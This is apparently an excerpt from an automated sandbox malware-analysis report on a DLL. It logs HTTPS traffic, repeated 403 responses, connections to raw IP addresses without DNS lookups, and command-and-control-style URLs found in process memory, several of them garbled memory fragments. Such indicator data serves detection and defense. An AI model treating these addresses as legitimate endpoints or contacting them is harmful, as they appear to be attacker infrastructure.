                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:03 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:05:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:03 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: rundll32.exe, 00000004.00000003.454870700.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                      Source: rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.454870700.00000000033DB000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: rundll32.exe, 00000004.00000003.453106675.0000000005465000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?24307bc719346
                      Source: rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/j
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/r
                      Source: rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/%
                      Source: rundll32.exe, 00000004.00000003.740452821.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/(
                      Source: loaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/.140.214:808/
                      Source: rundll32.exe, 00000004.00000003.479096259.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/C~g
                      Source: loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/Ht_
                      Source: loaddll32.exe, 00000000.00000003.491330486.00000000011B8000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/Kqfu(
                      Source: rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/My
                      Source: rundll32.exe, 00000004.00000003.454870700.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/N
                      Source: loaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/P
                      Source: loaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.547291056.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.637891796.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.543841202.0000000001156000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmpString found in binary or memory: https://143.244.140.214:808/oft
                      Source: loaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.F
                      Source: loaddll32.exe, 00000000.00000003.480245456.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://18185.56.219.47:8116/~
                      Source: loaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpString found in binary or memory: https://1845.77.0.96:6891/
                      Source: rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/m
                      Source: loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.785545934.000000000114D000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: rundll32.exe, 00000004.00000003.715591427.0000000003441000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/.
                      Source: loaddll32.exe, 00000000.00000003.603741779.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/0
                      Source: loaddll32.exe, 00000000.00000003.547291056.0000000001150000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4
                      Source: loaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/B
                      Source: rundll32.exe, 00000004.00000003.601489285.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/D
                      Source: loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.768805563.00000000033D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.462417469.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ES
                      Source: loaddll32.exe, 00000000.00000003.819035845.0000000001150000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.740542417.000000000339C000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/Ps%
                      Source: rundll32.exe, 00000004.00000003.548484641.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/h:
                      Source: loaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/l
                      Source: rundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ll
                      Source: rundll32.exe, 00000004.00000003.690111757.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/oft
                      Source: loaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.505189315.0000000001151000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.543841202.0000000001156000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.506581152.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/soft
                      Source: rundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/v
                      Source: rundll32.exe, 00000004.00000003.479096259.00000000033DB000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/wsupdate.com.edgesuite.nettm
